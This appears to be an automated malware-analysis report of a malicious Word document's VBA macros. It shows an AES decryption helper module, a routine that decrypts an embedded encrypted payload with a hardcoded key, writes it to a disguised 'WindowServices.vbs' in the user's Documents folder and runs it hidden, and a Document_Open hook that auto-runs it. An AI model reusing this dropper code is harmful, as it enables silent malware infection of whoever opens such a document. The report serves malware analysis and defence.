          271 | baEmpty = vbNullString | vbNullString
          272 | If IsArray(key) Then | IsArray
          273 | baKey = key |
          274 | Endif |
          275 | If KeyLen <= 0 Then |
          276 | KeyLen = AES_KEYLEN | AES_KEYLEN
          277 | Endif |
          278 | AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen) | m_uChunkedCtx
          279 | End Function |

          APIs | Meta Information

          pvArraySize

          BCryptHashData

          pvArrayPtr

          AES_BLOCK_SIZE

          AES_BLOCK_SIZE

          UBound

          AES_BLOCK_SIZE

          CopyMemory

          AES_BLOCK_SIZE

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          BCryptEncrypt

          BCryptHashData

          pvArrayPtr

          LastError

          Part of subcall function GetSystemMessage@Module3: Space$

          Part of subcall function GetSystemMessage@Module3: FormatMessage

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

          Part of subcall function GetSystemMessage@Module3: Len

          Part of subcall function GetSystemMessage@Module3: Mid$

          Part of subcall function GetSystemMessage@Module3: vbCrLf

          Part of subcall function GetSystemMessage@Module3: Left$

          Part of subcall function GetSystemMessage@Module3: Hex

          Line | Instruction | Meta Information
          395 | Private Function pvCryptoAesCtrCrypt(uCtx as UcsCryptoContextType, baData() as Byte, optional ByVal Offset as Long, optional ByVal Size as Long = - 1, optional ByVal HashBefore as Boolean, optional ByVal HashAfter as Boolean) as Boolean |
          402 | Dim lIdx as Long |
          403 | Dim lJdx as Long |
          404 | Dim lPadSize as Long |
          405 | Dim hResult as Long |
          407 | With uCtx |
          408 | If Size < 0 Then |
          409 | Size = pvArraySize(baData) - Offset | pvArraySize
          410 | Endif |
          411 | If HashBefore Then |
          412 | hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0) | BCryptHashData, pvArrayPtr
          413 | If hResult < 0 Then |
          414 | Goto QH |
          415 | Endif |
          416 | Endif |
          418 | For lIdx = Offset To Offset + Size - 1 |
          419 | If (. EncrPos And (AES_BLOCK_SIZE - 1)) = 0 Then | AES_BLOCK_SIZE
          420 | Exit For |
          421 | Endif |
          422 | baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos) |
          423 | . EncrPos = . EncrPos + 1 |
          424 | Next |
          425 | If lIdx < Offset + Size Then |
          427 | lPadSize = (Offset + Size - lIdx + AES_BLOCK_SIZE - 1) And - AES_BLOCK_SIZE | AES_BLOCK_SIZE
          428 | If UBound(. EncrData) + 1 < lPadSize Then | UBound
          429 | ReDim .EncrData(0 To lPadSize - 1) As Byte ' BAD ! |
          430 | Endif |
          432 | For lJdx = 0 To lPadSize - 1 Step AES_BLOCK_SIZE | AES_BLOCK_SIZE
          433 | Call CopyMemory(. EncrData(lJdx), . Nonce(0), AES_BLOCK_SIZE) | CopyMemory, AES_BLOCK_SIZE
          434 | If pvInc(. Nonce(3)) Then |
          435 | If pvInc(. Nonce(2)) Then |
          436 | If pvInc(. Nonce(1)) Then |
          437 | If pvInc(. Nonce(0)) Then |
          439 | Endif |
          440 | Endif |
          441 | Endif |
          442 | Endif |
          443 | Next | AES_BLOCK_SIZE
          444 | hResult = BCryptEncrypt(. hAesKey, . EncrData(0), lPadSize, 0, 0, 0, . EncrData(0), lPadSize, lJdx, 0) | BCryptEncrypt
          445 | If hResult < 0 Then |
          446 | Goto QH |
          447 | Endif |
          449 | For . EncrPos = 0 To Offset + Size - lIdx - 1 |
          450 | baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos) |
          451 | lIdx = lIdx + 1 |
          452 | Next |
          453 | Endif |
          454 | If HashAfter Then |
          455 | hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0) | BCryptHashData, pvArrayPtr
          456 | If hResult < 0 Then |
          457 | Goto QH |
          458 | Endif |
          459 | Endif |
          460 | End With |
          462 | pvCryptoAesCtrCrypt = True |
          463 | Exit Function |
          463 | QH: |
          465 | uCtx.LastError = GetSystemMessage(hResult) | LastError
          466 | End Function |

          APIs | Meta Information

          hAesAlg

          LastError

          ERR_CHUNKED_NOT_INIT

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Line | Instruction | Meta Information
          281 | Public Function AesChunkedCryptArray(baInput() as Byte, baOutput() as Byte, optional ByVal Final as Boolean = True) as Boolean |
          282 | If m_uChunkedCtx.hAesAlg = 0 Then | hAesAlg
          283 | m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT | LastError, ERR_CHUNKED_NOT_INIT
          284 | Exit Function |
          285 | Endif |
          286 | baOutput = baInput |
          287 | AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput) |
          288 | If Final Then |
          289 | pvCryptoAesCtrTerminate m_uChunkedCtx |
          290 | Endif |
          291 | End Function |

          APIs | Meta Information

          UBound

          String$

          UBound

          Len

          CryptBinaryToString

          VarPtr

          UBound

          CRYPT_STRING_BASE64

          StrPtr

          Left$

          Line | Instruction | Meta Information
          514 | Public Function ToBase64Array(baData() as Byte) as String |
          515 | Const CRYPT_STRING_BASE64 as Long = 1 |
          516 | Dim lSize as Long |
          518 | If UBound(baData) >= 0 Then | UBound
          519 | ToBase64Array = String$(2 * UBound(baData) + 6, 0) | String$, UBound
          520 | lSize = Len(ToBase64Array) + 1 | Len
          521 | Call CryptBinaryToString(VarPtr(baData(0)), UBound(baData) + 1, CRYPT_STRING_BASE64, StrPtr(ToBase64Array), lSize) | CryptBinaryToString, VarPtr, UBound, CRYPT_STRING_BASE64, StrPtr
          522 | ToBase64Array = Left$(ToBase64Array, lSize) | Left$
          523 | Endif |
          524 | End Function |

          APIs | Meta Information

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          vbNullString

          Line | Instruction | Meta Information
          542 | Public Function ToUtf8Array(sText as String) as Byte() |
          543 | Const CP_UTF8 as Long = 65001 |
          544 | Dim baRetVal() as Byte |
          545 | Dim lSize as Long |
          547 | lSize = WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), ByVal 0, 0, 0, 0) | WideCharToMultiByte, CP_UTF8, StrPtr, Len
          548 | If lSize > 0 Then |
          549 | Redim baRetVal(0 To lSize - 1) |
          550 | Call WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), baRetVal(0), lSize, 0, 0) | WideCharToMultiByte, CP_UTF8, StrPtr, Len
          551 | Else |
          552 | baRetVal = vbNullString | vbNullString
          553 | Endif |
          554 | ToUtf8Array = baRetVal |
          555 | End Function |

          APIs | Meta Information

          Space$

          FormatMessage

          FORMAT_MESSAGE_FROM_SYSTEM

          FORMAT_MESSAGE_IGNORE_INSERTS

          Len

          Mid$

          vbCrLf

          Left$

          Hex

          Line | Instruction | Meta Information
          568 | Public Function GetSystemMessage(ByVal lLastDllError as Long) as String |
          569 | Const FORMAT_MESSAGE_FROM_SYSTEM as Long = &H1000 |
          570 | Const FORMAT_MESSAGE_IGNORE_INSERTS as Long = &H200 |
          571 | Dim lSize as Long |
          573 | GetSystemMessage = Space$(2000) | Space$
          574 | lSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM Or FORMAT_MESSAGE_IGNORE_INSERTS, 0, lLastDllError, 0, GetSystemMessage, Len(GetSystemMessage), 0) | FormatMessage, FORMAT_MESSAGE_FROM_SYSTEM, FORMAT_MESSAGE_IGNORE_INSERTS, Len
          575 | If lSize > 2 Then |
          576 | If Mid$(GetSystemMessage, lSize - 1, 2) = vbCrLf Then | Mid$, vbCrLf
          577 | lSize = lSize - 2 |
          578 | Endif |
          579 | Endif |
          580 | GetSystemMessage = Left$(GetSystemMessage, lSize) & " &H" & Hex(lLastDllError) | Left$, Hex
          581 | End Function |

          APIs | Meta Information

          UBound

          String$

          UBound

          MultiByteToWideChar

          CP_UTF8

          UBound

          StrPtr

          Len

          Left$

          Line | Instruction | Meta Information
          557 | Public Function FromUtf8Array(baText() as Byte) as String |
          558 | Const CP_UTF8 as Long = 65001 |
          559 | Dim lSize as Long |
          561 | If UBound(baText) >= 0 Then | UBound
          562 | FromUtf8Array = String$(2 * (UBound(baText) + 1), 0) | String$, UBound
          563 | lSize = MultiByteToWideChar(CP_UTF8, 0, baText(0), UBound(baText) + 1, StrPtr(FromUtf8Array), Len(FromUtf8Array)) | MultiByteToWideChar, CP_UTF8, UBound, StrPtr, Len
          564 | FromUtf8Array = Left$(FromUtf8Array, lSize) | Left$
          565 | Endif |
          566 | End Function |

          APIs | Meta Information

          Len

          CryptStringToBinary

          StrPtr

          Len

          CRYPT_STRING_BASE64

          VarPtr

          vbNullString

          Line | Instruction | Meta Information
          526 | Public Function FromBase64Array(sText as String) as Byte() |
          527 | Const CRYPT_STRING_BASE64 as Long = 1 |
          528 | Dim lSize as Long |
          529 | Dim baOutput() as Byte |
          531 | lSize = Len(sText) + 1 | Len
          532 | Redim baOutput(0 To lSize - 1) |
          533 | Call CryptStringToBinary(StrPtr(sText), Len(sText), CRYPT_STRING_BASE64, VarPtr(baOutput(0)), lSize, 0, 0) | CryptStringToBinary, StrPtr, Len, CRYPT_STRING_BASE64, VarPtr
          534 | If lSize > 0 Then |
          535 | Redim Preserve baOutput(0 To lSize - 1) |
          536 | FromBase64Array = baOutput |
          537 | Else |
          538 | FromBase64Array = vbNullString | vbNullString
          539 | Endif |
          540 | End Function |

          APIs | Meta Information

          CopyMemory

          ArrPtr

          PTR_SIZE

          UBound

          LBound

          VarPtr

          LBound

          Line | Instruction | Meta Information
          489 | Private Property Get pvArrayPtr(baArray() as Byte, optional ByVal Index as Long) as LongPtr |
          490 | Dim lPtr as LongPtr |
          493 | Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE) | CopyMemory, ArrPtr, PTR_SIZE
          494 | If lPtr <> 0 Then |
          495 | If 0 <= Index And Index <= UBound(baArray) - LBound(baArray) Then | UBound, LBound
          496 | pvArrayPtr = VarPtr(baArray(LBound(baArray) + Index)) | VarPtr, LBound
          497 | Endif |
          498 | Endif |
          499 | End Property |

          APIs | Meta Information

          BCryptCloseAlgorithmProvider

          BCryptDestroyHash

          BCryptCloseAlgorithmProvider

          BCryptDestroyKey

          BCryptCloseAlgorithmProvider

          Line | Instruction | Meta Information
          370 | Private Sub pvCryptoAesCtrTerminate(uCtx as UcsCryptoContextType) |
          371 | With uCtx |
          372 | If . hPbkdf2Alg <> 0 Then |
          373 | Call BCryptCloseAlgorithmProvider(. hPbkdf2Alg, 0) | BCryptCloseAlgorithmProvider
          374 | . hPbkdf2Alg = 0 |
          375 | Endif |
          376 | If . hHmacHash <> 0 Then |
          377 | Call BCryptDestroyHash(. hHmacHash) | BCryptDestroyHash
          378 | . hHmacHash = 0 |
          379 | Endif |
          380 | If . hHmacAlg <> 0 Then |
          381 | Call BCryptCloseAlgorithmProvider(. hHmacAlg, 0) | BCryptCloseAlgorithmProvider
          382 | . hHmacAlg = 0 |
          383 | Endif |
          384 | If . hAesKey <> 0 Then |
          385 | Call BCryptDestroyKey(. hAesKey) | BCryptDestroyKey
          386 | . hAesKey = 0 |
          387 | Endif |
          388 | If . hAesAlg <> 0 Then |
          389 | Call BCryptCloseAlgorithmProvider(. hAesAlg, 0) | BCryptCloseAlgorithmProvider
          390 | . hAesAlg = 0 |
          391 | Endif |
          392 | End With |
          393 | End Sub |

          APIs | Meta Information

          CopyMemory

          ArrPtr

          PTR_SIZE

          UBound

          LBound

          Line | Instruction | Meta Information
          501 | Private Property Get pvArraySize(baArray() as Byte) as Long |
          502 | Dim lPtr as LongPtr |
          505 | Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE) | CopyMemory, ArrPtr, PTR_SIZE
          506 | If lPtr <> 0 Then |
          507 | pvArraySize = UBound(baArray) + 1 - LBound(baArray) | UBound, LBound
          508 | Endif |
          509 | End Property |

          APIs | Meta Information

          HashLen

          BCryptFinishHash

          hHmacHash

          HashLen

          Line | Instruction | Meta Information
          468 | Private Function pvCryptoGetFinalHash(uCtx as UcsCryptoContextType, ByVal lSize as Long) as Byte() |
          469 | Dim baResult() as Byte |
          471 | Redim baResult(0 To uCtx.HashLen - 1) | HashLen
          472 | Call BCryptFinishHash(uCtx.hHmacHash, baResult(0), uCtx.HashLen, 0) | BCryptFinishHash, hHmacHash, HashLen
          473 | Redim Preserve baResult(0 To lSize - 1) |
          474 | pvCryptoGetFinalHash = baResult |
          475 | End Function |

          APIs | Meta Information

          htonl

          htonl

          Line | Instruction | Meta Information
          477 | Private Function pvInc(lValue as Long) as Boolean |
          478 | lValue = htonl(lValue) | htonl
          479 | If lValue = - 1 Then |
          480 | lValue = 0 |
          482 | pvInc = True |
          483 | Else |
          484 | lValue = (lValue Xor &H80000000) + 1 Xor &H80000000 |
          485 | lValue = htonl(lValue) | htonl
          486 | Endif |
          487 | End Function |

          APIs | Meta Information

          LastError

          m_uChunkedCtx

          Line | Instruction | Meta Information
          293 | Public Function AesChunkedGetLastError() as String |
          294 | AesChunkedGetLastError = m_uChunkedCtx.LastError | LastError, m_uChunkedCtx
          295 | End Function |

          APIs | Meta Information

          CopyMemory

          PTR_SIZE

          Line | Instruction | Meta Information
          583 | Private Function PeekPtr(ByVal lPtr as LongPtr) as LongPtr |
          584 | Call CopyMemory(PeekPtr, ByVal lPtr, PTR_SIZE) | CopyMemory, PTR_SIZE
          585 | End Function |

          Module: ViewSession

          Declaration
          Line | Content
          1 | Attribute VB_Name = "ViewSession"
          2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
          3 | Attribute VB_GlobalNameSpace = False
          4 | Attribute VB_Creatable = False
          5 | Attribute VB_PredeclaredId = False
          6 | Attribute VB_Exposed = True
          7 | Attribute VB_TemplateDerived = False
          8 | Attribute VB_Customizable = False

          APIs | Meta Information

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: IsArray

          Part of subcall function AesDecryptString@Module3: IsMissing

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: String$

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGIC

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: Raise

          Part of subcall function AesDecryptString@Module3: vbObjectError

          Environ

          Open

          Len

          Mid

          CreateObject

          ShellExecute

          Strings | Decrypted Strings
          "Bnshekao@3123989942"
          "USERPROFILE"
          "Shell.Application"
          """"
          "open"
          Line | Instruction | Meta Information
          10

          Public Sub ikwiwiejs_19293_Ade()

          11

          Dim key as String

          12

          Dim decryptedText as String

          13

          Dim i as Integer

          14

          Dim parts(1 To 60) as String

          15

          Dim Oekksoioa_ as String

          16

          Dim chunkSize as Integer

          17

          Dim tempFilePath as String

          20

          key = "Bnshekao@3123989942"

          21

          part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"

          22

          part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"

          23

          part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"

          24

          part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"

          25

          part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"

          26

          part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"

          27

          part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"

          28

          part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"

          29

          part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"

          30

          part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"

          31

          part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"

          32

          part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"

          33

          part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"

          34

          part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"

          35

          part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"

          36

          part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"

          37

          part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"

          38

          part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"

          39

          part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"

          40

          part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"

          41

          part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"

          42

          part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"

          43

          part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"

          44

          part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"

          45

          Dim encryptedText as String

          46

          encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24

          47

          decryptedText = AesDecryptString(encryptedText, key)

          50

          chunkSize = 3000

          51

          Dim outputFilePath as String

          53

          vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

          Environ

          56

          Open vbsFilePath For Output As # 1

          Open

          57

          For i = 1 To Len(decryptedText) Step chunkSize

          Len

          58

          partText = Mid(decryptedText, i, chunkSize)

          Mid

          59

          Print # 1, partText

          60

          Next i

          Len

          61

          Close # 1

          63

          Dim shell as Object

          64

          Set shell = CreateObject("Shell.Application")

          CreateObject

          67

          shell.ShellExecute vbsFilePath, "", "", "open", 0

          ShellExecute

          71

          End Sub

          Line | Instruction | Meta Information
          73

          Private Sub Class_Initialize()

          75

          End Sub

          Module: ksksksksksksks

          Declaration
          Line | Content
          1

          Attribute VB_Name = "ksksksksksksks"

          2

          Attribute VB_Base = "1Normal.ThisDocument"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = True

          8

          Attribute VB_Customizable = True

          APIs | Meta Information

          OnTime

          Now

          TimeValue

          Strings | Decrypted Strings
          "DownloadAndRunEXE"
          Line | Instruction | Meta Information
          9

          Private Sub Document_Open()

          10

          Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"

          OnTime

          Now

          TimeValue

          11

          End Sub
